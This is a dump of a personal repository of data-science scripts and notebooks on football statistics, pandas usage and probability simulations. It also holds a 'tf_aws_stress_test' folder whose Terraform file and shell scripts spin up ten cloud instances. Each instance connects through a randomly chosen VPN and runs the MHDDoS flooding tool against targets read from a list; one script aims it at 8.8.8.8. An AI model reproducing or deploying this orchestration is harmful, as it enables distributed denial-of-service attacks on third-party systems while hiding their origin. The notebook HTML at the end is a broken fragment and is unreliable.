├── images
│   ├── leagues.jpg
│   ├── seasons.jpg
│   ├── full_table.JPG
│   ├── understat.JPG
│   ├── requests_response_1.jpg
│   └── requests_response_2.jpg
├── README.md
├── .gitignore
├── data-visualisation-bokeh.py
├── data
│   ├── cart.csv
│   ├── results.csv
│   └── dead_rusnia.csv
├── luck.py
├── playground.py
├── tf_aws_stress_test
│   ├── go.sh
│   ├── main.tf
│   └── generate.sh
├── add_two_numbers_as_linked_list.py
├── select_random_hashtags.py
├── longest_palindromic_substring.py
├── time-series.py
├── 538_xG_data.py
├── task_glovo.py
├── time-checks-generalized-experiment.py
├── leveraging-dataframes-in-python.py
├── update_aws_sg.py
├── time-checks.py
├── leveraging-dataframes-in-python.ipynb
├── co2_world.py
├── lambda_web_scraper.py
├── circle.html
├── data_manipulation_with_standard_lib.ipynb
├── football_why_winners_win_and_losers_loose.ipynb
├── co2-bokeh.ipynb
├── is_football_fair.ipynb
└── E-Commerce_ Predicting Sales.ipynb

/images/leagues.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/leagues.jpg
--------------------------------------------------------------------------------
/images/seasons.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/seasons.jpg
--------------------------------------------------------------------------------
/images/full_table.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/full_table.JPG
--------------------------------------------------------------------------------
/images/understat.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/understat.JPG
--------------------------------------------------------------------------------
/images/requests_response_1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_1.jpg
--------------------------------------------------------------------------------
/images/requests_response_2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/slehkyi/notebooks-for-articles/HEAD/images/requests_response_2.jpg
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Notebooks for Articles
2 | 
3 | Repository with random scripts and IPython Notebooks that I use to write my articles
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .idea/*
2 | /*.csv
3 | *.png
4 | # *.jpg
5 | .ipynb_checkpoints
6 | .terraform*
7 | *tfstate*
8 | tf_aws_stress_test/targets_l4.txt
9 | tf_aws_stress_test/targets_l7.txt
10 | venv/
--------------------------------------------------------------------------------
/data-visualisation-bokeh.py:
--------------------------------------------------------------------------------
1 | from bokeh.io import output_file, show
2 | from bokeh.plotting import figure
3 | plot = figure(plot_width=400, tools='pan,box_zoom')
4 | plot.circle([1,2,3,4,5], [8,6,5,2,3])
5 | output_file('circle.html')
6 | show(plot)
7 | 
--------------------------------------------------------------------------------
/data/cart.csv:
--------------------------------------------------------------------------------
1 | name,color,category,price,quantity
2 | t-shirt,black,top,20,1
3 | pants,white,bottom,50,1
4 | blazer,yellow,top,100,1
5 | t-shirt,red,top,15,2
6 | t-shirt,orange,top,25,1
7 | sneakers,white,footwear,100,1
8 | bracelet,green,accessories,5,3
--------------------------------------------------------------------------------
/luck.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | 
3 | luck = 777
4 | actions = 100000
5 | total_hits = []
6 | 
7 | for i in range(actions):
8 |     a = np.random.randint(0, 1000)
9 |     if a == luck:
10 |         total_hits.append(i)
11 | 
12 | 
13 | print(total_hits)
14 | print(len(total_hits))
15 | 
--------------------------------------------------------------------------------
/playground.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | import requests
3 | from bs4 import BeautifulSoup
4 | 
5 | # df = pd.read_csv('data/data_blog.csv')
6 | 
7 | res = requests.get('https://understat.com/league/La_liga/2017/')
8 | 
9 | soup = BeautifulSoup(res.content, 'html.parser')
10 | # print(soup.prettify())
11 | 
12 | table = soup.find_all('script')
13 | print(table)
14 | 
--------------------------------------------------------------------------------
/data/results.csv:
--------------------------------------------------------------------------------
1 | team1,team2,goals1,goals2,result
2 | Barcelona,Granada,4,0,1
3 | Barcelona,Sevilla,1,1,X
4 | Barcelona,Athletic,2,1,1
5 | Barcelona,Cadiz,1,2,2
6 | Barcelona,Valencia,0,0,X
7 | Barcelona,Celta,3,2,1
8 | Barcelona,Girona,6,1,1
9 | Barcelona,Osasuna,1,0,1
10 | Barcelona,Real Madrid,4,0,1
11 | Barcelona,Betis,4,4,X
12 | Barcelona,Villarreal,4,2,1
--------------------------------------------------------------------------------
/tf_aws_stress_test/go.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
3 | set -x
4 | 
5 | cd /home/ubuntu/MHDDoS
6 | source venv/bin/activate
7 | 
8 | echo 'Starting'
9 | # sudo /etc/init.d/windscribe-cli start
10 | windscribe connect "Rakia"
11 | 
12 | python3 start.py TCP 8.8.8.8:80 512 60 true
13 | python3 start.py TCP 8.8.8.8:443 512 60 true
14 | 
15 | windscribe disconnect
16 | deactivate
17 | echo 'Finished, shutting down...'
18 | 
19 | # sudo shutdown
--------------------------------------------------------------------------------
/add_two_numbers_as_linked_list.py:
--------------------------------------------------------------------------------
1 | # Definition for singly-linked list.
2 | class ListNode(object):
3 |     def __init__(self, x):
4 |         self.val = x
5 |         self.next = None
6 | 
7 | class Solution:
8 |     def addTwoNumbers(self, l1, l2, c = 0):
9 |         # Digits are stored in reverse order: add the current pair plus carry.
10 |         if l1 is None and l2 is None and c == 0:
11 |             return None
12 |         total = (l1.val if l1 else 0) + (l2.val if l2 else 0) + c
13 |         node = ListNode(total % 10)
14 |         node.next = self.addTwoNumbers(l1.next if l1 else None,
15 |                                        l2.next if l2 else None,
16 |                                        total // 10)
17 |         return node
18 | 
19 | l1 = ListNode(2)
20 | l1.next = ListNode(4)
21 | l1.next.next = ListNode(3)
22 | 
23 | l2 = ListNode(5)
24 | l2.next = ListNode(6)
25 | l2.next.next = ListNode(4)
26 | 
27 | result = Solution().addTwoNumbers(l1, l2)
28 | while result:
29 |     print(result.val, end=' ')
30 |     result = result.next
31 | # 7 0 8
32 | 
--------------------------------------------------------------------------------
/select_random_hashtags.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | import pandas as pd
3 | 
4 | 
5 | file = 'data/hashtags.csv'
6 | 
7 | data = pd.read_csv(file)
8 | 
9 | amount_of_tags = 27
10 | selected_tags = []
11 | top_limit = len(data)
12 | 
13 | for i in range(top_limit):
14 |     rand_ind = np.random.randint(0, len(data))
15 |     to_select = data.iloc[rand_ind, 0]
16 |     selected_tags.append(to_select)
17 |     data = data.drop(data.index[rand_ind], axis=0)  # reassign, so the same tag cannot be picked twice
18 |     if len(selected_tags) == amount_of_tags:
19 |         break
20 | 
21 | for i in range(amount_of_tags):
22 |     print('#'+selected_tags[i])
23 | 
--------------------------------------------------------------------------------
/longest_palindromic_substring.py:
--------------------------------------------------------------------------------
1 | class Solution:
2 |     def longest_palindrome(self, s):
3 |         if s == s[::-1]:
4 |             return [s]
5 |         max_len = 2
6 |         winners = []
7 |         for i in range(len(s)):
8 |             for ln in range(i+1, len(s)+1):
9 |                 ss = s[i:ln]
10 |                 if ss == ss[::-1]:
11 |                     if len(ss) >= max_len:
12 |                         max_len = len(ss)
13 |                         winners.append(ss)
14 | 
15 |         winners = [x for x in winners if len(x) == max_len]
16 | 
17 |         return winners
18 | 
19 | st = "aamamamnaa"
20 | print(Solution().longest_palindrome(st))
21 | 
22 | 
--------------------------------------------------------------------------------
/tf_aws_stress_test/main.tf:
--------------------------------------------------------------------------------
1 | terraform {
2 |   required_providers {
3 |     aws = {
4 |       source  = "hashicorp/aws"
5 |       version = "~> 3.27"
6 |     }
7 |   }
8 | 
9 |   required_version = ">= 0.14.9"
10 | }
11 | 
12 | provider "aws" {
13 |   profile = "default"
14 |   region  = "eu-west-1"
15 | }
16 | 
17 | resource "aws_instance" "android_terminator" {
18 | 
19 |   count = 10
20 | 
21 |   ami             = "ami-0e0f48e669d76f99d"
22 |   instance_type   = "t2.micro"
23 |   security_groups = ["no-security-no-cry"]
24 |   user_data       = "${file("go_${count.index}.sh")}"
25 | 
26 |   tags = {
27 |     Name = "article-${count.index}"
28 |   }
29 |   volume_tags = {
30 |     "Name" = "article-${count.index}"
31 |   }
32 | }
--------------------------------------------------------------------------------
/time-series.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | import numpy as np
3 | import matplotlib.pyplot as plt
4 | import glob
5 | import seaborn as sns
6 | 
7 | sns.set()
8 | 
9 | pattern = 'data/madrid*.csv'
10 | csv_files = glob.glob(pattern)
11 | 
12 | frames = []
13 | 
14 | for csv in csv_files:
15 |     df = pd.read_csv(csv, index_col='date', parse_dates=True)
16 |     frames.append(df)
17 | 
18 | df = pd.concat(frames)
19 | 
20 | df_time = df[['O_3', 'PM10']][df['station'] == 28079008].dropna()
21 | 
22 | df_time = df_time.sort_index()  # sort chronologically before resampling
23 | 
24 | df_plot = df_time.resample('M').mean()
25 | plt.plot(df_plot)
26 | plt.title('O3 and PM10 air pollution levels')
27 | plt.ylabel('micrograms per cubic meter (µg/m³)')
28 | plt.xticks(rotation=45)
29 | plt.show()
30 | 
--------------------------------------------------------------------------------
/538_xG_data.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | 
3 | URL = 'https://projects.fivethirtyeight.com/soccer-api/club/spi_matches.csv'
4 | data = pd.read_csv(URL)
5 | 
6 | championship = data[data['league'] == 'English League Championship']
7 | championship = championship[['season', 'date', 'team1', 'team2', 'xg1', 'xg2']]
8 | championship['xga1'] = championship['xg2']
9 | championship['xga2'] = championship['xg1']
10 | 
11 | home_data = championship[['season', 'team1', 'xg1', 'xga1']]
12 | away_data = championship[['season', 'team2', 'xg2', 'xga2']]
13 | 
14 | home_grouped = home_data.groupby(['season', 'team1']).mean().reset_index()
15 | away_grouped = away_data.groupby(['season', 'team2']).mean().reset_index()
16 | 
17 | final_data = pd.merge(home_grouped, away_grouped, left_on=['team1','season'], right_on=['team2','season'])
18 | final_data.drop(['team2'], axis='columns', inplace=True)
19 | final_data.rename({'team1': 'team', 'xg1': 'xG_h', 'xga1': 'xGA_h', 'xg2': 'xG_a', 'xga2': 'xGA_a'}, axis='columns', inplace=True)
20 | 
21 | final_data.to_csv('data/xGA_championship.csv', index=False)
22 | print("Done!")
--------------------------------------------------------------------------------
/task_glovo.py:
--------------------------------------------------------------------------------
1 | heights = [9,8,7,8,9,5,6]
2 | # heights = [1,9,3,3,5,5,3,5,7,3]
3 | ln = len(heights)
4 | total_sum = 0
5 | 
6 | 
7 | def find_hole(heights):
8 |     first_max = 0
9 |     ind_first_max = 0
10 |     second_max = 0
11 |     ind_second_max = 0
12 |     # find borders
13 |     for ind, h in enumerate(heights):
14 |         if h > first_max:
15 |             ind_second_max, second_max = ind_first_max, first_max  # demote the old maximum to second place
16 |             ind_first_max, first_max = ind, h
17 |         elif (h >= second_max and ind != ind_first_max):
18 |             ind_second_max, second_max = ind, h
19 | 
20 |     # if borders create a hole, calculate the volume
21 |     if abs(ind_first_max-ind_second_max) > 1:
22 |         reverse = []
23 |         for h in heights[min(ind_first_max, ind_second_max):max(ind_first_max, ind_second_max)+1]:
24 |             reverse.append(second_max-h)
25 |         part_sum = sum([x for x in reverse if x>0])
26 |     else:
27 |         part_sum = 0
28 | 
29 |     return part_sum, ind_first_max, ind_second_max
30 | 
31 | 
32 | start = 0
33 | finish = ln
34 | # go through the list looking for holes and calculating their volumes till the end
35 | while finish - start > 1:
36 |     part_sum, ind_first_max, ind_second_max = find_hole(heights[start:finish])
37 |     total_sum += part_sum
38 |     start += max([ind_second_max,ind_first_max])
39 | 
40 | 
41 | print("Total sum: "+str(total_sum))
--------------------------------------------------------------------------------
/tf_aws_stress_test/generate.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | rm -rf go_*.sh
3 | 
4 | # Params
5 | LAYER=$1
6 | TARGETS=$2
7 | 
8 | VPNS=("Goodbye Lenin" "Hermitage" "Shnur" "Rakia")
9 | MAX_INDEX=$(expr ${#VPNS[@]} - 1)
10 | COUNTER=0
11 | 
12 | while IFS="" read -r TARGET || [ -n "${TARGET}" ]
13 | do
14 |     RAND=$(shuf -i 0-${MAX_INDEX} -n 1)
15 |     VPN=${VPNS[${RAND}]}
16 |     if [[ $LAYER -eq 4 ]]
17 |     then
18 |         # Template
19 |         cat << EOF > go_$COUNTER.sh
20 | #!/bin/bash
21 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
22 | set -x
23 | 
24 | cd /home/ubuntu/MHDDoS
25 | source venv/bin/activate
26 | 
27 | echo 'Starting'
28 | windscribe connect "$VPN" # vpn name as param from list
29 | 
30 | python3 start.py $TARGET 256 3600 true # from list
31 | 
32 | windscribe disconnect
33 | deactivate
34 | echo 'Finished, shutting down...'
35 | 
36 | sudo shutdown
37 | EOF
38 |     fi
39 |     if [[ $LAYER -eq 7 ]]
40 |     then
41 |         # Template
42 |         cat << EOF > go_$COUNTER.sh
43 | #!/bin/bash
44 | exec 1> /home/ubuntu/from_terraform_with_love.log 2>&1
45 | set -x
46 | 
47 | cd /home/ubuntu/MHDDoS
48 | source venv/bin/activate
49 | 
50 | echo 'Starting'
51 | windscribe connect "$VPN" # vpn name as param from list
52 | 
53 | python3 start.py $TARGET 5 256 "" 200 60 true # from list
54 | 
55 | windscribe disconnect
56 | deactivate
57 | echo 'Finished, shutting down...'
58 | 
59 | sudo shutdown
60 | EOF
61 |     fi
62 |     let COUNTER=${COUNTER}+1
63 | done < ${TARGETS}
--------------------------------------------------------------------------------
/time-checks-generalized-experiment.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | import matplotlib.pyplot as plt
3 | import seaborn as sns
4 | 
5 | sns.set()
6 | 
7 | amount_of_checks = 1000  # how many times a person checks her/his phone
8 | 
9 | np.random.seed(666)
10 | a = np.random.binomial(amount_of_checks, 0.044, size=10000)
11 | p_a_2 = np.sum(a > 1) / 10000
12 | p_a_3 = np.sum(a > 2) / 10000
13 | p_a_4 = np.sum(a > 3) / 10000
14 | print(" === Assuming average person checks their phone " + str(amount_of_checks) + " times per day === ")
15 | print("Probability of seeing 'lucky time' two times per day: "
16 |       + str(p_a_2) + ", three: " + str(p_a_3) + ", four: " + str(p_a_4))
17 | 
18 | n_sequential = 0
19 | size = amount_of_checks
20 | sample = 1000000
21 | 
22 | for s in range(sample):
23 |     rare = np.random.random(size=size) < 0.044
24 |     n_rare = np.sum(rare)
25 |     if n_rare > 1:
26 |         for i in range(size):
27 |             if i == size-1:
28 |                 break
29 |             elif rare[i] and rare[i+1]:
30 |                 n_sequential += 1
31 |     if s % 1000 == 0:
32 |         print('Processed: ' + str(s) + ' samples.')
33 | 
34 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample)))
35 | 
36 | bins = np.arange(0, max(a) + 1.5) - 0.5
37 | 
38 | # plt.subplot(3, 1, 1)
39 | plt.hist(a, bins=bins, density=True, color='red')
40 | plt.title('Phone usage')
41 | plt.xlabel('Amount of "lucky hours" spotted during the day')
42 | plt.ylabel('Probability')
43 | plt.show()
44 | 
--------------------------------------------------------------------------------
/leveraging-dataframes-in-python.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | import numpy as np
3 | 
4 | cols = ['col0', 'col1', 'col2', 'col3', 'col4']
5 | rows = ['row0', 'row1', 'row2', 'row3', 'row4']
6 | data = np.random.randint(0, 100, size=(5, 5))
7 | df = pd.DataFrame(data, columns=cols, index=rows)
8 | 
9 | df.head()
10 | 
11 | df['col1']['row1']
12 | 
13 | df.loc['row4', 'col2']
14 | 
15 | df.iloc[4, 2]
16 | 
17 | df_new = df[['col1', 'col2']]
18 | df_new.head(3)
19 | 
20 | df_new = df[['col1', 'col2']][1:4]
21 | df_new.head(3)
22 | 
23 | df['col0']
24 | df.loc[:, 'col0']
25 | df.iloc[:, 0]
26 | 
27 | df['col3'][2:5]
28 | 
29 | df.loc['row1':'row4', :]
30 | df.iloc[1:5, :]
31 | 
32 | df.loc[:, 'col1':'col4']
33 | df.iloc[:, 1:5]
34 | 
35 | df.loc['row1':'row4', 'col1':'col4']
36 | df.iloc[1:5, 1:5]
37 | 
38 | df.loc['row2':'row4', ['col1', 'col3']]
39 | df.iloc[2:5, [1, 3]]
40 | 
41 | df[df['col1'] > 20]
42 | # assigning the condition to a variable also works
43 | condition = df['col1'] > 20
44 | df[condition]
45 | 
46 | df[(df['col1'] > 25) & (df['col3'] < 30)]  # logical and
47 | df[(df['col1'] > 25) | (df['col3'] < 30)]  # logical or
48 | df[~(df['col1'] > 25)]  # logical not
49 | 
50 | df.iloc[3, 3] = 0
51 | df.iloc[1, 2] = np.nan
52 | df.iloc[4, 0] = np.nan
53 | df['col5'] = 0
54 | df['col6'] = np.NaN
55 | df.head()
56 | 
57 | df.loc[:, df.all()]
58 | 
59 | df.loc[:, df.any()]
60 | 
61 | df.loc[:, df.isnull().any()]
62 | 
63 | df.loc[:, df.notnull().all()]
64 | 
65 | df_na_any = df.dropna(how='any')  # if any value in a row is NaN the row will be dropped
66 | df_na_all = df.dropna(how='all', axis=1)  # if all values in a column are NaN the column will be dropped
67 | 
68 | # Filter a column based on another
69 | df['col1'][df['col2'] > 35]
70 | 
71 | df.loc[df['col2'] > 35, 'col1'] += 5
72 | df[df['col1'] > 35]
73 | 
74 | df['new_col'] = df['col4'].apply(lambda n: n*2)
75 | 
76 | df.index.str.upper()
77 | 
78 | df.index.map(str.lower)
79 | 
80 | red_vs_blue = {0:'blue', 12:'red'}
81 | 
82 | df['color'] = df['col3'].map(red_vs_blue)
83 | df.head()
84 | 
85 | df['col7'] = df['col3'] + df['col4']
86 | df.head()
--------------------------------------------------------------------------------
/update_aws_sg.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import boto3
3 | from botocore.exceptions import ClientError
4 | 
5 | GROUP_ID = 'GROUP-ID'
6 | RULE_DESCRIPTION = 'Rule Description'
7 | NEW_IP = requests.get('http://checkip.amazonaws.com').text[:-1] + '/32'
8 | OLD_IP = ''
9 | 
10 | ec2 = boto3.client('ec2')
11 | 
12 | try:
13 |     response = ec2.describe_security_groups(GroupIds=[GROUP_ID])
14 | except ClientError as e:
15 |     print(e)
16 |     raise  # cannot continue without the security group description
17 | 
18 | sg = response['SecurityGroups']
19 | for el in range(len(sg)):
20 |     if sg[el]['GroupId'] == GROUP_ID:
21 |         ip_pems = sg[el]['IpPermissions']
22 |         for i in range(len(ip_pems)):
23 |             if ip_pems[i]['IpRanges'][0]['Description'] == RULE_DESCRIPTION:
24 |                 OLD_IP = ip_pems[i]['IpRanges'][0]['CidrIp']
25 |                 print('Old office IP %s' % OLD_IP)
26 | 
27 | if (OLD_IP != NEW_IP) and (OLD_IP != ''):
28 |     try:
29 |         d = ec2.revoke_security_group_ingress(
30 |             GroupId = GROUP_ID,
31 |             IpPermissions=[
32 |                 {
33 |                     'FromPort': 3306,
34 |                     'ToPort': 3306,
35 |                     'IpProtocol': 'tcp',
36 |                     'IpRanges': [
37 |                         {
38 |                             'CidrIp': OLD_IP,
39 |                             'Description': RULE_DESCRIPTION
40 |                         }
41 |                     ]
42 |                 }
43 |             ]
44 |         )
45 |         print('Ingress successfully removed %s' % d)
46 |     except ClientError as e:
47 |         print(e)
48 | 
49 |     try:
50 |         d = ec2.authorize_security_group_ingress(
51 |             GroupId = GROUP_ID,
52 |             IpPermissions=[
53 |                 {
54 |                     'FromPort': 3306,
55 |                     'ToPort': 3306,
56 |                     'IpProtocol': 'tcp',
57 |                     'IpRanges': [
58 |                         {
59 |                             'CidrIp': NEW_IP,
60 |                             'Description': RULE_DESCRIPTION
61 |                         }
62 |                     ]
63 |                 }
64 |             ]
65 |         )
66 |         print('Ingress successfully set %s' % d)
67 |     except ClientError as e:
68 |         print(e)
69 | 
--------------------------------------------------------------------------------
/time-checks.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | import matplotlib.pyplot as plt
3 | import seaborn as sns
4 | 
5 | sns.set()
6 | 
7 | np.random.seed(666)
8 | a_min = np.random.binomial(28, 0.044, size=10000)
9 | p_a_min_2 = np.sum(a_min > 1) / 10000
10 | p_a_min_3 = np.sum(a_min > 2) / 10000
11 | p_a_min_4 = np.sum(a_min > 3) / 10000
12 | print(" === Assuming average person checks their phone 28 times per day === ")
13 | print("Probability of seeing 'lucky time' two times per day: "
14 |       + str(p_a_min_2) + ", three: " + str(p_a_min_3) + ", four: " + str(p_a_min_4))
15 | 
16 | a_avg = np.random.binomial(47, 0.044, size=10000)
17 | p_a_avg_2 = np.sum(a_avg > 1) / 10000
18 | p_a_avg_3 = np.sum(a_avg > 2) / 10000
19 | p_a_avg_4 = np.sum(a_avg > 3) / 10000
20 | print(" === Assuming average person checks their phone 47 times per day === ")
21 | print("Probability of seeing 'lucky time' two times per day: "
22 |       + str(p_a_avg_2) + ", three: " + str(p_a_avg_3) + ", four: " + str(p_a_avg_4))
23 | 
24 | a_max = np.random.binomial(86, 0.044, size=10000)
25 | p_a_max_2 = np.sum(a_max > 1) / 10000
26 | p_a_max_3 = np.sum(a_max > 2) / 10000
27 | p_a_max_4 = np.sum(a_max > 3) / 10000
28 | print(" === Assuming average person checks their phone 86 times per day === ")
29 | print("Probability of seeing 'lucky time' two times per day: "
30 |       + str(p_a_max_2) + ", three: " + str(p_a_max_3) + ", four: " + str(p_a_max_4))
31 | 
32 | n_sequential = 0
33 | size = 28
34 | sample = 100000
35 | 
36 | for _ in range(sample):
37 |     rare = np.random.random(size=size) < 0.044
38 |     n_rare = np.sum(rare)
39 |     if n_rare > 1:
40 |         for i in range(size):
41 |             if i == size-1:
42 |                 break
43 |             elif rare[i] and rare[i+1]:
44 |                 n_sequential += 1
45 | 
46 | print("Probability of two rare events one after another: " + str(float(n_sequential/sample)))
47 | 
48 | bins_min = np.arange(0, max(a_min) + 1.5) - 0.5
49 | bins_avg = np.arange(0, max(a_avg) + 1.5) - 0.5
50 | bins_max = np.arange(0, max(a_max) + 1.5) - 0.5
51 | 
52 | # plt.subplot(3, 1, 1)
53 | plt.hist(a_min, bins=bins_min, density=True, color='red')
54 | plt.title('Minimum phone usage')
55 | plt.xlabel('Amount of "lucky hours" spotted during the day')
56 | plt.ylabel('Probability')
57 | plt.show()
58 | 
59 | # plt.subplot(3, 1, 2)
60 | plt.hist(a_avg, bins=bins_avg, density=True, color='green')
61 | plt.title('Average phone usage')
62 | plt.xlabel('Amount of "lucky hours" spotted during the day')
63 | plt.ylabel('Probability')
64 | plt.show()
65 | 
66 | # plt.subplot(3, 1, 3)
67 | plt.hist(a_max, bins=bins_max, density=True, color='blue')
68 | plt.title('Maximum phone usage')
69 | plt.xlabel('Amount of "lucky hours" spotted during the day')
70 | plt.ylabel('Probability')
71 | plt.show()
72 | 
73 | 
--------------------------------------------------------------------------------
/leveraging-dataframes-in-python.ipynb:
--------------------------------------------------------------------------------
1 | {
2 |  "cells": [
3 |   {
4 |    "cell_type": "code",
5 |    "execution_count": 3,
6 |    "metadata": {},
7 |    "outputs": [],
8 |    "source": [
9 |     "import pandas as pd\n",
10 |     "import numpy as np"
11 |    ]
12 |   },
13 |   {
14 |    "cell_type": "code",
15 |    "execution_count": 18,
16 |    "metadata": {},
17 |    "outputs": [],
18 |    "source": [
19 |     "cols = ['col1', 'col2', 'col3', 'col4', 'col5']\n",
20 |     "rows = ['row1', 'row2', 'row3', 'row4', 'row5']\n",
21 |     "df = pd.DataFrame(np.random.randint(0,100,size=(5, 5)), columns=cols, index=rows)"
22 |    ]
23 |   },
24 |   {
25 |    "cell_type": "code",
26 |    "execution_count": 20,
27 |    "metadata": {},
28 |    "outputs": [
29 |     {
30 |      "data": {
31 |       "text/html": [
| \n", 50 | " | col1 | \n", 51 | "col2 | \n", 52 | "col3 | \n", 53 | "col4 | \n", 54 | "col5 | \n", 55 | "
|---|---|---|---|---|---|
| row1 | \n", 60 | "81 | \n", 61 | "72 | \n", 62 | "33 | \n", 63 | "25 | \n", 64 | "89 | \n", 65 | "
| row2 | \n", 68 | "84 | \n", 69 | "39 | \n", 70 | "19 | \n", 71 | "85 | \n", 72 | "55 | \n", 73 | "
| row3 | \n", 76 | "61 | \n", 77 | "68 | \n", 78 | "76 | \n", 79 | "70 | \n", 80 | "60 | \n", 81 | "
| row4 | \n", 84 | "36 | \n", 85 | "97 | \n", 86 | "75 | \n", 87 | "84 | \n", 88 | "92 | \n", 89 | "
| row5 | \n", 92 | "72 | \n", 93 | "48 | \n", 94 | "19 | \n", 95 | "35 | \n", 96 | "69 | \n", 97 | "